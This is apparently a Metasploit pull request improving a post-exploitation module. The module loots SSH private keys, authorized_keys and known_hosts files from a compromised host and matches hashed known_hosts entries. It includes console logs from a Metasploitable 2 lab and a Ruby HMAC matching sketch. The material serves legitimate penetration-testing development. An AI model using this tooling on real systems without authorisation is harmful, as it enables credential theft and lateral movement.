
ssh_creds: PARSE_KNOWN_HOSTS & CRACK_KNOWN_HOSTS #21511

Open
g0tmi1k wants to merge 8 commits into rapid7:master from g0tmi1k:ssh_creds

g0tmi1k commented May 27, 2026

This PR helps to improve by doing:

  • Use SSH mixin
  • Add PARSE_KNOWN_HOSTS & CRACK_KNOWN_HOSTS options, map out where target has been connecting to
  • Tweak output
  • Consistency with loot and other modules
  • Update module metadata

Target is Metasploitable 2.

        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      0         1      0      0      0
After : *        default  1      1         1      1      5      1

Note, this module uses the exploit/multi/ssh/sshexec module to get a session. However, it's not using the PR I recently opened up improving it (that's out of scope for this PR).

Before

  • Private key loading could silently fail
  • Private key downloaded as loot but not stored as a credential
  • known_hosts files downloaded but never analysed - left to user to do manually
  • Services: 0
    • Thus vuln wasn't linked

$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/multi/ssh/sshexec;
run RHOSTS=10.0.0.10 USERNAME=msfadmin PASSWORD=msfadmin TARGET="Interactive SSH" PAYLOAD=generic/ssh/interact -z;
use post/multi/gather/ssh_creds;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[*] SSH session 1 opened (10.0.0.1:34217 -> 10.0.0.10:22) at 2026-05-27 07:22:38 +0100
[*] Session 1 created in the background.

Module options (post/multi/gather/ssh_creds):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


View the full module info with the info, or info -d command.

msf post(multi/gather/ssh_creds) >
msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      0      0      0

msf post(multi/gather/ssh_creds) > run SESSION=1
[*] Finding .ssh directories
[*] Looting 3 .ssh directories
[*] Looting /home/msfadmin/.ssh directory
[+] Downloaded /home/msfadmin/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527072328_default_10.0.0.10_ssh.authorized_k_062625.txt
[-] Could not load SSH Key: invalid curve name
[+] Downloaded /home/msfadmin/.ssh/id_rsa -> /home/kali/.msf4/loot/20260527072331_default_10.0.0.10_ssh.id_rsa_064617.txt
[+] Downloaded /home/msfadmin/.ssh/id_rsa.pub -> /home/kali/.msf4/loot/20260527072334_default_10.0.0.10_ssh.id_rsa.pub_405138.txt
[*] Looting /home/user/.ssh directory
[!] Cannot access directory: /home/user/.ssh . Missing execute permission. Skipping.
[*] Looting /root/.ssh directory
[+] Downloaded /root/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527072338_default_10.0.0.10_ssh.authorized_k_041137.txt
[+] Downloaded /root/.ssh/known_hosts -> /home/kali/.msf4/loot/20260527072341_default_10.0.0.10_ssh.known_hosts_951312.txt
[*] Post module execution completed
msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      1      5      0

msf post(multi/gather/ssh_creds) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf post(multi/gather/ssh_creds) > vulns

Vulnerabilities
===============

Timestamp                Host       Service  Resource  Name                     References
---------                ----       -------  --------  ----                     ----------
2026-05-27 06:22:38 UTC  10.0.0.10  None     {}        SSH User Code Execution  CVE-1999-0502,ATT&CK-T1021.004

msf post(multi/gather/ssh_creds) > creds
Credentials
===========

id   host  origin     service  public    private                                          realm  private_type  JtR Format  cracked_password
--   ----  ------     -------  ------    -------                                          -----  ------------  ----------  ----------------
593        10.0.0.10           msfadmin  57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a         SSH key

msf post(multi/gather/ssh_creds) > loot

Loot
====

host       service  type                 name                 content     info                          path
----       -------  ----                 ----                 -------     ----                          ----
10.0.0.10           ssh.authorized_keys  ssh_authorized_keys  text/plain  OpenSSH authorized_keys File  /home/kali/.msf4/loot/20260527072328_default_10.0.0.10_ssh.authorized_k_062625.txt
10.0.0.10           ssh.id_rsa           ssh_id_rsa           text/plain  OpenSSH id_rsa File           /home/kali/.msf4/loot/20260527072331_default_10.0.0.10_ssh.id_rsa_064617.txt
10.0.0.10           ssh.id_rsa.pub       ssh_id_rsa.pub       text/plain  OpenSSH id_rsa.pub File       /home/kali/.msf4/loot/20260527072334_default_10.0.0.10_ssh.id_rsa.pub_405138.txt
10.0.0.10           ssh.authorized_keys  ssh_authorized_keys  text/plain  OpenSSH authorized_keys File  /home/kali/.msf4/loot/20260527072338_default_10.0.0.10_ssh.authorized_k_041137.txt
10.0.0.10           ssh.known_hosts      ssh_known_hosts      text/plain  OpenSSH known_hosts File      /home/kali/.msf4/loot/20260527072341_default_10.0.0.10_ssh.known_hosts_951312.txt

msf post(multi/gather/ssh_creds) >

After

$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/multi/ssh/sshexec;
run RHOSTS=10.0.0.10 USERNAME=msfadmin PASSWORD=msfadmin TARGET="Interactive SSH" PAYLOAD=generic/ssh/interact -z;
use post/multi/gather/ssh_creds;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[*] SSH session 1 opened (10.0.0.1:39183 -> 10.0.0.10:22) at 2026-05-27 07:44:12 +0100
[*] Session 1 created in the background.

Module options (post/multi/gather/ssh_creds):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CRACK_KNOWN_HOSTS  true             no        Attempt to identify hashed known_hosts entries by checking against workspace hosts
   PARSE_KNOWN_HOSTS  true             no        Parse plaintext known_hosts entries and store as workspace hosts
   SESSION                             yes       The session to run this module on


View the full module info with the info, or info -d command.

msf post(multi/gather/ssh_creds) >
msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      0      0      0

msf post(multi/gather/ssh_creds) > run SESSION=1
[*] Finding .ssh directories
[*] Looting 3 .ssh directories
[*] Looting /home/msfadmin/.ssh directory
[*] User: msfadmin
[+] Downloaded: /home/msfadmin/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527074444_default_10.0.0.10_ssh.msfadmin.aut_669207.txt
[+] Downloaded: /home/msfadmin/.ssh/id_rsa -> /home/kali/.msf4/loot/20260527074447_default_10.0.0.10_ssh.privatekey.r_686269.txt
[+] Stored SSH private key (id_rsa) for user: msfadmin
[+] Downloaded: /home/msfadmin/.ssh/id_rsa.pub -> /home/kali/.msf4/loot/20260527074450_default_10.0.0.10_ssh.publickey.rs_546440.txt
[*] Looting /home/user/.ssh directory
[!] Cannot access directory: /home/user/.ssh - Missing execute permission
[*] Looting /root/.ssh directory
[*] User: root
[+] Downloaded: /root/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527074454_default_10.0.0.10_ssh.root.authori_178272.txt
[+] Downloaded: /root/.ssh/known_hosts -> /home/kali/.msf4/loot/20260527074457_default_10.0.0.10_ssh.root.known_h_414686.txt
[*] Parsed 0 host entries from known_hosts
[+] Matched hashed known_hosts entry: localhost (10.0.0.10)
[*] Matched 1 hashed entry against workspace hosts
[*] Post module execution completed
msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      1      5      1

msf post(multi/gather/ssh_creds) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info                                comments
-------    ---  ----  -------  ---------  -----  -------  ----                                --------
10.0.0.10             Unknown                    device   Matched via hashed SSH known_hosts

msf post(multi/gather/ssh_creds) > services
Services
========

host       port  proto  name  state  info  resource  parents
----       ----  -----  ----  -----  ----  --------  -------
10.0.0.10  22    tcp    ssh   open         {}

msf post(multi/gather/ssh_creds) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                     References
---------                ----       -------       --------  ----                     ----------
2026-05-27 06:44:12 UTC  10.0.0.10  ssh (22/tcp)  {}        SSH User Code Execution  CVE-1999-0502,ATT&CK-T1021.004

msf post(multi/gather/ssh_creds) > creds
Credentials
===========

id   host  origin     service  public    private                                          realm  private_type  JtR Format  cracked_password
--   ----  ------     -------  ------    -------                                          -----  ------------  ----------  ----------------
595        10.0.0.10           msfadmin  57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a         SSH key

msf post(multi/gather/ssh_creds) > loot

Loot
====

host       service  type                          name                      content     info                                                path
----       -------  ----                          ----                      -------     ----                                                ----
10.0.0.10           ssh.msfadmin.authorized_keys  msfadmin_authorized_keys  text/plain  OpenSSH authorized_keys File                        /home/kali/.msf4/loot/20260527074444_default_10.0.0.10_ssh.msfadmin.aut_669207.txt
10.0.0.10           ssh.privatekey.rsa            msfadmin_id_rsa           text/plain  SHA256:f2VC/Mf1KPOyVzqeE6QpplojiGKjOzu8At+KIDT8T0U  /home/kali/.msf4/loot/20260527074447_default_10.0.0.10_ssh.privatekey.r_686269.txt
10.0.0.10           ssh.publickey.rsa             msfadmin_id_rsa.pub       text/plain  SHA256:f2VC/Mf1KPOyVzqeE6QpplojiGKjOzu8At+KIDT8T0U  /home/kali/.msf4/loot/20260527074450_default_10.0.0.10_ssh.publickey.rs_546440.txt
10.0.0.10           ssh.root.authorized_keys      root_authorized_keys      text/plain  OpenSSH authorized_keys File                        /home/kali/.msf4/loot/20260527074454_default_10.0.0.10_ssh.root.authori_178272.txt
10.0.0.10           ssh.root.known_hosts          root_known_hosts          text/plain  OpenSSH known_hosts File                            /home/kali/.msf4/loot/20260527074457_default_10.0.0.10_ssh.root.known_h_414686.txt

msf post(multi/gather/ssh_creds) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type            Data
 ----                     ----       -------  ----  --------  ----            ----
 2026-05-27 06:44:47 UTC  10.0.0.10  ssh      22    tcp       ssh.privatekey  {:user=>"msfadmin", :file=>"id_rsa", :fingerprint=>"SHA256:f2VC/Mf1KPOyVzqeE6QpplojiGKjOzu8At+KIDT8T0U"}

msf post(multi/gather/ssh_creds) >
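
Added example, not part of the PR or the module's code: a Ruby sketch of how OpenSSH's hashed known_hosts entries (`|1|salt|hash`, HMAC-SHA1 keyed with the salt) can be matched against a list of candidate names, which is why HashKnownHosts only hides hosts that cannot be guessed. The function names, the candidate list standing in for workspace hosts, and all sample salts, names and key blobs are constructed for illustration.

```ruby
require 'openssl'
require 'base64'

# OpenSSH hashed host field: "|1|" + base64(salt) + "|" + base64(HMAC-SHA1(key=salt, data=name))
def hash_host(name, salt)
  mac = OpenSSL::HMAC.digest('SHA1', salt, name)
  "|1|#{Base64.strict_encode64(salt)}|#{Base64.strict_encode64(mac)}"
end

# Parse known_hosts text; hashed and plaintext host fields are kept apart.
def parse_known_hosts(text)
  text.each_line.filter_map do |line|
    fields = line.strip.split
    next if fields.empty? || fields.first.start_with?('#')
    marker = fields.first.start_with?('@') ? fields.shift : nil # @cert-authority / @revoked
    next if fields.length < 3 # need hosts, key type and key
    hosts, keytype = fields
    if hosts.start_with?('|1|')
      _, _, salt, mac = hosts.split('|')
      { hashed: true, salt: Base64.decode64(salt.to_s), mac: Base64.decode64(mac.to_s),
        keytype: keytype, marker: marker }
    else
      { hashed: false, hosts: hosts.split(','), keytype: keytype, marker: marker }
    end
  end
end

# Return the first candidate whose HMAC under the entry's salt equals the stored MAC.
# Non-default ports are stored as "[host]:port", so those forms are tried as well.
def identify(entry, candidates, ports = [])
  forms = candidates.flat_map { |c| [c] + ports.map { |p| "[#{c}]:#{p}" } }
  forms.find { |name| OpenSSL::HMAC.digest('SHA1', entry[:salt], name) == entry[:mac] }
end

# Constructed sample file: salts, host names and the key blob are made up.
KEY = 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYBLOBCONSTRUCTED'
SAMPLE = <<~KH
  # constructed known_hosts sample
  build.example.test,192.0.2.7 #{KEY}
  #{hash_host('10.0.0.10', 'constructed-salt-01a')} #{KEY}
  #{hash_host('[10.0.0.20]:2222', 'constructed-salt-02b')} #{KEY}
  #{hash_host('not-in-candidates.example.test', 'constructed-salt-03c')} #{KEY}
KH

# Plaintext entries yield their host list; hashed ones yield the matched name or nil.
def resolve_sample(candidates, ports)
  parse_known_hosts(SAMPLE).map { |e| e[:hashed] ? identify(e, candidates, ports) : e[:hosts] }
end
p resolve_sample(%w[10.0.0.10 10.0.0.20], [2222])
```

The last sample entry stays `nil` because its name is not among the candidates; a hashed entry is only as private as its hostname is hard to enumerate.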
